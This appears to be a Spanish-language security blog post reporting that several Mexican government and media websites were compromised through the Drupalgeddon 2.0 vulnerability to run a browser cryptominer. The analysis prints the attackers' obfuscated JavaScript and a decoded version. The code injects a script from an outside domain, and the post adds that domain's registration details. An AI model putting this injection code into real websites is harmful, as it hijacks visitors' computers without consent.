Hace más de un mes se hizo pública una vulnerabilidad en Drupal (Software de Gestión de Contenido) llamada Drupalgeddon 2.0. (info: https://seekurity.com/services/goto/1g). Esta vulnerabilidad permite ejecutar comandos remotamente en dichas plataformas. Los criminales están aprovechando esta vulnerabilidad tomando ventaja de los administradores que durante un mes no han tenido el cuidado de actualizar sus sistemas, ya que al día de hoy aproximadamente 400 sitios están infectados.
México no queda exento a estos ataques ya que los visitantes de algunos sitios mexicanos están minando criptomonedas para alguien más…
-
- Gobierno de Chihuahua https://seekurity.com/services/goto/1j
-
- Instituto de Seguridad Social del Estado de México y Municipios https://seekurity.com/services/goto/1k
- Horloger de El Economista https://seekurity.com/services/goto/1h
Al ingresar a dichos sitios, la extensión MinerBlock fue la única que detectó al minero y realizó el bloqueo pertinente de su ejecución evitando que se consuman los recursos del equipo.
Estos son los código ofuscados que se encuentran en las páginas:
HIR Casa:
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73’; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);
Instituto de Seguridad Social del Estado de México y Municipios:
var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);
Horloger de El Economista.
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);
Gobierno de Chihuahua:
Del sitio web del gobierno de Chihuahua identificamos en donde se encuentra el minero ya que tal vez fue eliminado por los administradores, sin embargo el sitio se encuentra listado dentro de los 400 sitios infectados en todo el mundo.
Al desofuscar el código, vemos que la URL a la que apuntan los mineros es vuuwd[.]com, lo cual nos indica que estos sitios son parte de la misma campaña que hasta hace unas horas se encontraba activa.
var dZ1= window["document"]["getElementsByTagName"]('\head')[0]; var ZBRnO2= window["document"]["\createElement"]('script'); ZBRnO2["type"]= 'text/javascript'; ZBRnO2["id"]='m_g_a';ZBRnO2["src"]= 'https://vuuwd.com/t.js'; dZ1["\appendChild"](ZBRnO2);
El dominio está registrado a nombre de una persona en China:
Registrant Name: Wang hang
Registrant Organization:
Registrant Street: China
Registrant City: Hong Kong
Registrant State/Province: HK
Registrant Postal Code: 999077
Registrant Country: CN
Registrant Phone: +852.95672581
Registrant Email: [email protected]
Espero hayan disfrutado del post!
¡Su atención por favor!
¿Estás construyendo un sitio web? ¿Ya tienes uno? ¿Te preocupa su seguridad? ¡Piénsalo dos veces antes de lanzarlo públicamente y déjanos proteger tu negocio!
El Economista Gobierno Chihuahua Gobierno del Estado de México Gobierno México HIR Casa issemym
Previous Next